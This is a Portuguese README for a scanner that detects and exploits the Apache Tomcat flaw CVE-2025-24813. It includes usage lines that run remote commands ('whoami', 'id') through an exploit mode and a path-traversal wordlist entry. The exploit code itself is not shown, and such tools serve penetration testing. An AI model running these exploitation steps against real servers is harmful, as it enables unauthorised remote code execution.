
TomcatScanner é uma ferramenta de segurança abrangente projetada para detectar e explorar a vulnerabilidade CVE-2025-24813 em servidores Apache Tomcat.
O TomcatScanner é uma ferramenta de segurança abrangente projetada para detetar e explorar a vulnerabilidade CVE-2025-24813 em servidores Apache Tomcat. Esta vulnerabilidade envolve um problema de equivalência de caminho no parâmetro 'file.Name' que pode levar à execução remota de código (RCE).

git clone https://github.com/yourusername/tomcat-scanner.git
cd tomcat-scanner
pip install -r requirements.txt
O ficheiro requirements.txt deve incluir:
requests>=2.28.0
urllib3>=1.26.0
Crie um ficheiro chamado wordlist.txt com caminhos para testar a vulnerabilidade ou use a wordlist de amostra fornecida.
Analisar um único alvo:
python tomcat_scanner.py -u http://example.com:8080
Analisar múltiplos alvos a partir de um ficheiro:
python tomcat_scanner.py -l targets.txt
usage: tomcat_scanner.py [-h] [-u URL] [-l LIST] [-w WORDLIST] [-t THREADS]
[-o OUTPUT] [--timeout TIMEOUT] [--ssl-verify]
[-v] [--exploit] [--command COMMAND]
Scanner da vulnerabilidade CVE-2025-24813 no Apache Tomcat
argumentos opcionais:
-h, --help mostra esta mensagem de ajuda e sai
-u URL, --url URL URL do alvo único (ex.: http://example.com:8080)
-l LIST, --list LIST Ficheiro contendo uma lista de URLs alvo
-w WORDLIST, --wordlist WORDLIST
Ficheiro wordlist contendo caminhos a testar (padrão: wordlist.txt)
-t THREADS, --threads THREADS
Número de threads paralelas (padrão: 10)
-o OUTPUT, --output OUTPUT
Ficheiro de saída para os resultados
--timeout TIMEOUT Tempo limite do pedido em segundos (padrão: 5)
--ssl-verify Verificar certificados SSL
-v, --verbose Ativa o modo verboso com códigos de resposta HTTP
--exploit Tenta explorar alvos vulneráveis
--command COMMAND Comando de teste para o modo de exploração (padrão: echo CVE-2025-24813)
Para não apenas detetar, mas também explorar a vulnerabilidade:
python tomcat_scanner.py -u http://vulnerable-server.com:8080 --exploit
Especifique um comando personalizado a executar durante a exploração:
python tomcat_scanner.py -u http://vulnerable-server.com:8080 --exploit --command "whoami"
python tomcat_scanner.py -u http://example.com:8080 -w my_wordlist.txt
python tomcat_scanner.py -u http://example.com:8080 -t 20 -v
python tomcat_scanner.py -l target_list.txt -o vulnerable_targets.txt
python tomcat_scanner.py -u http://example.com:8080 --exploit --command "id" -v --timeout 10
O TomcatScanner requer uma wordlist de caminhos a testar. A wordlist deve conter caminhos potencialmente vulneráveis, um por linha.
Exemplo de entradas da wordlist:
/path/uploads/file.name
/webapps/manager/file.name
/tomcat/manager/uploads/file.name
/uploads/../sessions/absholi7ly.session
A ferramenta fornece saída codificada por cores para identificar facilmente informações importantes:
No final de cada análise, a ferramenta exibe um resumo com:
A CVE-2025-24813 afeta o Apache Tomcat e envolve uma vulnerabilidade de equivalência de caminho na forma como a aplicação lida com o parâmetro 'file.Name'. Esta vulnerabilidade pode permitir que atacantes:
A vulnerabilidade manifesta-se tipicamente quando um pedido PUT é permitido escrever num caminho que contém "file.name" ou quando a travessia de caminho é possível através de uma operação PUT parcial.
ESTA FERRAMENTA É FORNECIDA APENAS PARA FINS EDUCACIONAIS E DE TESTES ÉTICOS.
A utilização do TomcatScanner para atacar alvos sem consentimento mútuo prévio é ilegal. É da responsabilidade do utilizador final cumprir todas as leis locais, estaduais e federais aplicáveis. Os desenvolvedores não assumem qualquer responsabilidade e não são responsáveis por qualquer uso indevido ou dano causado por este programa.
Contribuições são bem-vindas! Sinta-se à vontade para submeter um Pull Request.
Passos para contribuir:
git checkout -b feature/amazing-feature)git commit -m 'Adicionar funcionalidade incrível')git push origin feature/amazing-feature)Este projeto está licenciado sob a Licença MIT - consulte o ficheiro LICENSE para mais detalhes.
MIT License
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files...